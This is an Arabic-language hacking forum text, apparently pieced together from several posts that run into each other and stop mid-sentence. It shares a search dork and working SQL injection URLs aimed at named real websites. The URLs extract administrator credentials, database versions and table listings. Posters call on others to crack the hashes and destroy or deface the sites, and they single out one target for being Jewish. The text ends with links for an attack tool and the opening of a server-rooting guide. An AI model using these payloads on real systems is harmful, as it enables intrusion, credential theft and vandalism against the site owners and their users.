السلام عليكم جميعا و رحمة الله ، حياكم الله يا إخواني ، أتمنى أن يكون الجميع بخير و عافية
لقد أتيتكم في موضوعي هذا و بحوزتي Dork لإستخراج صفحات الفايس بوك التي تم حقنها من قبل و المحتمل أنها مصابة بثغرة الــــ sql InJeCtIoN تفضلو هذا هو الدورك
allinurl: union select site:apps.facebook.com
يا عناكب الظلام
عاوز اشوف اندكس رائع على هذة الموقع
فك الهاش ودمر
http://www.inf-fni.org/admin
http://www.inf-fni.org/pages.php?id=-7+union+select+1,2,3,4,concat(username,0x3a,password),6,7,8,9,10,11,12+from+administrator--
بسم الله نبداء
الموقع الاول
http://www.elysee.ru/showimg.php?id=-245++union+select+1,2,3,4,5,8,7,8,9,version%28%29--
الموقع التانى
http://juggler.artinact.com/a-imglib/showimg.php?id=-6+union+select+1,2,version(),4,5,6,7,8--
عاوز اشوفهم فى قسم انجازات الاعضاء
أين عمود اليسير والباس هنا
نهاية الحقنة
http://www.skms.net/past.php?id=65%20and%201=-0+union+select+group_concat(table_name,0x3a,column_name,0x3a,table_schema),2,3,4,5+from+information_schema.columns+where+table_name=0x666f72756d5f6262636f646573--
smilies6
يلة يا عناك دمروو
الاصدار الخامس
5.1.48
http://www.culturecrossing.net/basics_business_student.php?id=56%20and%201=0%20UNION%20SELECT%201,version%28%29,3,4,5,6,7,8,9,10,11,12,13,14--
موقع يهودى محقون نص حقنة هتقدر
الموقع اهوو
http://www.qumeran.com/news.php?id=-28+Union+select+1,2,concat(table_name,0x3a,column_name,0x3a,table_schema),4,5,6,7,8+from+information_schema.columns+where+table_name=0x616666696c6961746573+limit+2,1--
صور البرنامج
ملفات الى محتاجة البرنامجخليهم مع البرنامج
http://www.majorgeeks.com/files/mscomctl.zip
"
"
http://www.telefonica.net/web2/telamarinera/h/mswinsck.zip
وبعدين انتا مش محتاج دورك البرنامج فى دوركات حلوة
تحميل البرنامج
اولا :- عمليه الاكسس
ثانيا:- عمليه التروييت مباشره
بسم الله نبداء :-
اولا لو انت بتستهدف سرفر من الشائع جدا انك تلاقى فيه ثغره زى ال sql او ال bsql ومنها ممكن تعمل انك تحقن ملف او كود معين فى السرفر من خلال ال dumpfile/outfile وده مش موضوعنا النهارده انما الموضوع كله هيبتدى فى الملف...